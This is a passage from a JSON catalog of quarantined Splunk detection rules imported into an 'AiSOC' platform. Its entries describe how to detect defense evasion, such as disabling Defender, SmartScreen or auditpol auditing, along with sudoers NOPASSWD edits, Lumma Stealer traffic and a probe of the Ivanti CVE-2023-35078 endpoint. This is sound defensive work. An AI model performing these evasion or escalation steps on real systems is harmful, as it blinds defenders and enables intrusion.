Endpoint.Registry datamodel to identify changes where the registry value is set to 0x00000000. This activity is significant as it may indicate an attempt to override authentication levels for remote connections, a tactic used by DarkGate malware for malicious installations. 
If confirmed malicious, this could allow attackers to gain unauthorized remote access, potentially leading to data exfiltration or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-authenticationleveloverride.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6410a403-36bb-490f-a06a-11c3be7d2a41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_authenticationleveloverride.yml" } }, { "id": "splunk-security-content-64bc2fa3-c493-44b4-8e94-3e5dbf71377e", "type": "detection", "name": "ESXi Loghost Config Tampering", "description": "This detection identifies changes to the syslog loghost configuration on an ESXi host, which may indicate an attempt to disrupt log forwarding and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-loghost-config-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64bc2fa3-c493-44b4-8e94-3e5dbf71377e", "source_commit": "4d4c7ee", "license": "Apache-2.0", 
"license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_loghost_config_tampering.yml" } }, { "id": "splunk-security-content-64c7adaa-48ee-483c-b0d6-7175bc65e6cc", "type": "detection", "name": "Domain Controller Discovery with Wmic", "description": "The following analytic identifies the execution of `wmic.exe` with command-line arguments used to discover domain controllers in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it is commonly used by adversaries and Red Teams for situational awareness and Active Directory discovery. If confirmed malicious, this behavior could allow attackers to map out the network, identify key systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-controller-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64c7adaa-48ee-483c-b0d6-7175bc65e6cc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_controller_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-64eb091f-8cab-4b41-9b09-8fb4942377df", "type": "detection", "name": "Windows Snake Malware Service Create", "description": "The following analytic detects 
the creation of a new service named WerFaultSvc with a binary path in the Windows WinSxS directory. It leverages Windows System logs, specifically EventCode 7045, to identify this activity. This behavior is significant because it indicates the presence of Snake malware, which uses this service to maintain persistence by blending in with legitimate Windows services. If confirmed malicious, this activity could allow an attacker to execute Snake malware components, leading to potential data exfiltration, system compromise, and long-term persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-service-create.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64eb091f-8cab-4b41-9b09-8fb4942377df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_service_create.yml" } }, { "id": "splunk-security-content-64f91df1-49ec-46aa-81bd-2282d3cea765", "type": "detection", "name": "Geographic Improbable Location", "description": "Geolocation data can be inaccurate or easily spoofed by Remote Employment Fraud (REF) workers. REF actors sometimes slip up and reveal their true location, creating what we call 'improbable travel' scenarios \u2014 logins from opposite sides of the world within minutes. 
This identifies situations where these travel scenarios occur.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/geographic-improbable-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64f91df1-49ec-46aa-81bd-2282d3cea765", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/geographic_improbable_location.yml" } }, { "id": "splunk-security-content-64fa82dd-fd11-472a-9e94-c221fffa591d", "type": "detection", "name": "Windows Modify Registry Utilize ProgIDs", "description": "The following analytic detects modifications to the Windows Registry specifically targeting Programmatic Identifier (ProgID) associations to bypass the Windows User Account Control (UAC) feature. ValleyRAT may create or alter registry entries that associate targeted ProgIDs, such as `.pwn` files, with malicious processes, allowing it to execute harmful scripts or commands when these files are opened. By monitoring for unusual changes in registry keys linked to ProgIDs, this detection enables security analysts to identify potential threats like ValleyRAT execution attempts. 
Early detection of these modifications helps mitigate unauthorized execution and prevents further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-utilize-progids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "64fa82dd-fd11-472a-9e94-c221fffa591d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_utilize_progids.yml" } }, { "id": "splunk-security-content-651df959-ad17-4b73-a323-90cb96d5fa1b", "type": "detection", "name": "Linux Auditd Nopasswd Entry In Sudoers File", "description": "The following analytic detects the addition of NOPASSWD entries to the /etc/sudoers file on Linux systems. It leverages Linux Auditd data to identify command lines containing \"NOPASSWD:\". This activity is significant because it allows users to execute commands with elevated privileges without requiring a password, which can be exploited by adversaries to maintain persistent, privileged access. 
If confirmed malicious, this could lead to unauthorized privilege escalation, persistent access, and potential compromise of sensitive data and system integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-nopasswd-entry-in-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "651df959-ad17-4b73-a323-90cb96d5fa1b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_nopasswd_entry_in_sudoers_file.yml" } }, { "id": "splunk-security-content-651ee958-a433-471c-b264-39725b788b83", "type": "detection", "name": "PowerShell Invoke CIMMethod CIMSession", "description": "The following analytic detects the creation of a New-CIMSession cmdlet followed by the use of the Invoke-CIMMethod cmdlet within PowerShell. It leverages PowerShell Script Block Logging to identify these specific cmdlets in the ScriptBlockText field. This activity is significant because it mirrors the behavior of the Invoke-WMIMethod cmdlet, often used for remote code execution via NTLMv2 pass-the-hash authentication. 
If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access and control over targeted systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-invoke-cimmethod-cimsession.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "651ee958-a433-471c-b264-39725b788b83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_invoke_cimmethod_cimsession.yml" } }, { "id": "splunk-security-content-65224d8b-b95d-44ec-bb44-408d830c1258", "type": "detection", "name": "Windows Disable Internet Explorer Addons", "description": "The following analytic detects the execution of iexplore.exe (Internet Explorer) with the -extoff command-line flag, which disables all browser extensions. This flag is commonly abused by adversaries to launch a clean browser session that bypasses security controls such as antivirus browser extensions, toolbars, or group policy-enforced add-ons.\nMalicious documents or scripts may leverage iexplore.exe -extoff to open phishing pages, command-and-control interfaces, or download additional payloads in an environment free from security monitoring plugins. 
While this flag may be used legitimately by IT administrators for troubleshooting purposes, its use in modern enterprise environments is rare and should be considered suspicious\u2014particularly when launched by Office applications, scripting engines (e.g., PowerShell, WScript), or scheduled tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-internet-explorer-addons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65224d8b-b95d-44ec-bb44-408d830c1258", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_internet_explorer_addons.yml" } }, { "id": "splunk-security-content-65615b3a-62ea-4d65-bb9f-6f07c17df4ea", "type": "detection", "name": "Windows WinLogon with Public Network Connection", "description": "The following analytic detects instances of Winlogon.exe, a critical Windows process, connecting to public IP addresses. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on network connections made by Winlogon.exe. Under normal circumstances, Winlogon.exe should not connect to public IPs, and such activity may indicate a compromise, such as the BlackLotus bootkit attack. This detection is significant as it highlights potential system integrity breaches. 
If confirmed malicious, attackers could maintain persistence, bypass security measures, and compromise the system at a fundamental level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-winlogon-with-public-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65615b3a-62ea-4d65-bb9f-6f07c17df4ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_winlogon_with_public_network_connection.yml" } }, { "id": "splunk-security-content-65711630-f9bf-11eb-8d72-acde48001122", "type": "detection", "name": "Powershell Execute COM Object", "description": "The following analytic detects the execution of a COM CLSID through PowerShell. It leverages EventCode 4104 and searches for specific script block text indicating the creation of a COM object. This activity is significant as it is commonly used by adversaries and malware, such as the Conti ransomware, to execute commands, potentially for privilege escalation or bypassing User Account Control (UAC). 
If confirmed malicious, this technique could allow attackers to gain elevated privileges or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-execute-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65711630-f9bf-11eb-8d72-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_execute_com_object.yml" } }, { "id": "splunk-security-content-657902a9-987d-4879-a1b2-e7a65512824b", "type": "detection", "name": "AWS Disable Bucket Versioning", "description": "The following analytic detects when AWS S3 bucket versioning is suspended by a user. It leverages AWS CloudTrail logs to identify `PutBucketVersioning` events with the `VersioningConfiguration.Status` set to `Suspended`. This activity is significant because disabling versioning can prevent recovery of deleted or modified data, which is a common tactic in ransomware attacks. 
If confirmed malicious, this action could lead to data loss and hinder recovery efforts, severely impacting data integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-disable-bucket-versioning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "657902a9-987d-4879-a1b2-e7a65512824b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_disable_bucket_versioning.yml" } }, { "id": "splunk-security-content-65862e8a-799a-4509-ae1c-4602aa139580", "type": "detection", "name": "Cisco Duo Policy Bypass 2FA", "description": "The following analytic detects instances where a Duo policy is created or updated to allow access without two-factor authentication (2FA). It identifies this behavior by searching Duo administrator activity logs for policy changes that set the authentication status to \"Allow access without 2FA.\" By monitoring for these specific actions, the analytic highlights potential attempts to weaken authentication controls, which could be indicative of malicious activity or insider threats. This behavior is critical for a SOC to identify, as bypassing 2FA significantly reduces the security posture of an organization, making it easier for attackers to gain unauthorized access to sensitive systems and data. 
Detecting and responding to such policy changes promptly helps prevent potential account compromise and mitigates the risk of broader security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65862e8a-799a-4509-ae1c-4602aa139580", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_bypass_2fa.yml" } }, { "id": "splunk-security-content-65d4b105-ec52-48ec-ac46-289d0fbf7d96", "type": "detection", "name": "Windows Impair Defense Delete Win Defender Profile Registry", "description": "The following analytic detects the deletion of the Windows Defender main profile registry key. It leverages data from the Endpoint.Registry datamodel, specifically monitoring for deleted actions within the Windows Defender registry path. This activity is significant as it indicates potential tampering with security defenses, often associated with Remote Access Trojans (RATs) and other malware. 
If confirmed malicious, this action could allow an attacker to disable Windows Defender, reducing the system's ability to detect and respond to further malicious activities, thereby compromising endpoint security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-delete-win-defender-profile-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "65d4b105-ec52-48ec-ac46-289d0fbf7d96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_delete_win_defender_profile_registry.yml" } }, { "id": "splunk-security-content-663a7a50-b752-4c84-975b-8325ca3f6f9e", "type": "detection", "name": "Windows Audit Policy Auditing Option Disabled via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\", \"/option\" and \"/value:disable\" command-line arguments used to disable specific auditing options of the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-auditing-option-disabled-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "663a7a50-b752-4c84-975b-8325ca3f6f9e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_auditing_option_disabled_via_auditpol.yml" } }, { "id": "splunk-security-content-664f0fd0-91ff-11eb-a56f-acde48001122", "type": "detection", "name": "Disable Windows SmartScreen Protection", "description": "The following analytic detects modifications to the Windows registry that disable SmartScreen protection. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with SmartScreen settings. This activity is significant because SmartScreen provides an early warning system against phishing and malware. Disabling it can indicate malicious intent, often seen in Remote Access Trojans (RATs) to evade detection while downloading additional payloads. 
If confirmed malicious, this action could allow attackers to bypass security measures, increasing the risk of successful phishing attacks and malware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-smartscreen-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "664f0fd0-91ff-11eb-a56f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_smartscreen_protection.yml" } }, { "id": "splunk-security-content-66ab15c0-63d0-11ec-9e70-acde48001122", "type": "detection", "name": "Linux Common Process For Elevation Control", "description": "The following analytic identifies the execution of common Linux processes used for elevation control, such as `chmod`, `chown`, and `setuid`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because these processes are often abused by adversaries to gain persistence or escalate privileges on compromised hosts. 
If confirmed malicious, this behavior could allow attackers to modify file attributes, change file ownership, or set user IDs, potentially leading to unauthorized access and control over critical system resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-common-process-for-elevation-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66ab15c0-63d0-11ec-9e70-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_common_process_for_elevation_control.yml" } }, { "id": "splunk-security-content-66adc486-224d-45c1-8e4d-9e7eeaba988f", "type": "detection", "name": "O365 Multiple AppIDs and UserAgents Authentication Spike", "description": "The following analytic identifies unusual authentication activity in an O365 environment, where a single user account experiences more than 8 authentication attempts using 3 or more unique application IDs and over 5 unique user agents within a short timeframe. It leverages O365 audit logs, focusing on authentication events and applying statistical thresholds. This behavior is significant as it may indicate an adversary probing for multi-factor authentication weaknesses. If confirmed malicious, it suggests a compromised account, potentially leading to unauthorized access, privilege escalation, and data exfiltration. 
Early detection is crucial to prevent further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-appids-and-useragents-authentication-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66adc486-224d-45c1-8e4d-9e7eeaba988f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml" } }, { "id": "splunk-security-content-66b6ad5e-339a-40af-b721-dacefc7bdb75", "type": "detection", "name": "Windows AD Hidden OU Creation", "description": "This analytic is looking for when an ACL is applied to an OU which denies listing the objects residing in the OU. 
This activity combined with modifying the owner of the OU will hide AD objects even from domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-hidden-ou-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66b6ad5e-339a-40af-b721-dacefc7bdb75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_hidden_ou_creation.yml" } }, { "id": "splunk-security-content-66b9c9ba-7fb2-4e80-a3a2-496e5e078167", "type": "detection", "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", "description": "The following analytic detects attempts to exploit CVE-2023-35078, a vulnerability in Ivanti Endpoint Manager Mobile (EPMM) versions up to 11.4.\nIt identifies HTTP requests to the endpoint \"/mifs/aad/api/v2/authorized/users?*\" with a status code of 200 in web logs.\nThis activity is significant as it indicates unauthorized remote access to restricted functionalities or resources.\nIf confirmed malicious, this could lead to data theft, unauthorized modifications, or further system compromise, necessitating immediate action to mitigate potential severe impacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", 
"enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epmm-remote-unauthenticated-api-access-cve-2023-35078.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66b9c9ba-7fb2-4e80-a3a2-496e5e078167", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078.yml" } }, { "id": "splunk-security-content-66cb378f-234d-4fe1-bb4c-e7878ff6b017", "type": "detection", "name": "Azure AD Multiple Service Principals Created by SP", "description": "The following analytic detects when a single service principal in Azure AD creates more than three unique OAuth applications within a 10-minute span. It leverages Azure AD audit logs, specifically monitoring the 'Add service principal' operation initiated by service principals. This behavior is significant as it may indicate an attacker using a compromised or malicious service principal to rapidly establish multiple service principals, potentially staging an attack. 
If confirmed malicious, this activity could facilitate network infiltration or expansion, allowing the attacker to gain unauthorized access and persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-service-principals-created-by-sp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66cb378f-234d-4fe1-bb4c-e7878ff6b017", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_service_principals_created_by_sp.yml" } }, { "id": "splunk-security-content-66f22f52-fbae-4be7-a263-561dacb63612", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Outbound Connection Attempt", "description": "This analytic detects Lumma Stealer outbound connection attempts using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signatures with IDs 64797, 64798, 64799, 64800, 64801, 64167, 64168, 64169, 62709 have been triggered. 
If confirmed malicious, this behavior could indicate an active infection of Lumma Stealer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-outbound-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f22f52-fbae-4be7-a263-561dacb63612", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_outbound_connection_attempt.yml" } }, { "id": "splunk-security-content-66f22f52-fbae-4be7-a263-561dacb63613", "type": "detection", "name": "Cisco Secure Firewall - Lumma Stealer Download Attempt", "description": "This analytic detects Lumma Stealer download attempts using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signatures with IDs 64797, 64798, 64799, 64800, 64801, 64167, 64168, 64169 have been triggered. 
If confirmed malicious, this behavior could indicate an active infection of Lumma Stealer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-lumma-stealer-download-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f22f52-fbae-4be7-a263-561dacb63613", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___lumma_stealer_download_attempt.yml" } }, { "id": "splunk-security-content-66f737c6-3f7f-46ed-8e9b-cc0e5bf01f04", "type": "detection", "name": "Linux Auditd Unix Shell Configuration Modification", "description": "The following analytic detects suspicious access or modifications to Unix shell configuration files, which may indicate an attempt to alter system behavior or gain unauthorized access.\nUnix shell configuration files, such as `.bashrc` or `.profile`, control user environment settings and command execution.\nUnauthorized changes to these files can be used to execute malicious commands, escalate privileges, or hide malicious activities.\nBy monitoring for unusual or unauthorized modifications to shell configuration files, this analytic helps identify potential security threats, allowing security teams to respond quickly and mitigate risks.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-unix-shell-configuration-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "66f737c6-3f7f-46ed-8e9b-cc0e5bf01f04", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_unix_shell_configuration_modification.yml" } }, { "id": "splunk-security-content-67340df1-3f1d-4470-93c8-9ac7249d11b0", "type": "detection", "name": "Windows RDPClient Connection Sequence Events", "description": "This analytic monitors Windows RDP client connection sequence events (EventCode 1024) from the Microsoft-Windows-TerminalServices-RDPClient/Operational log. These events track when RDP ClientActiveX initiates connection attempts to remote servers. The 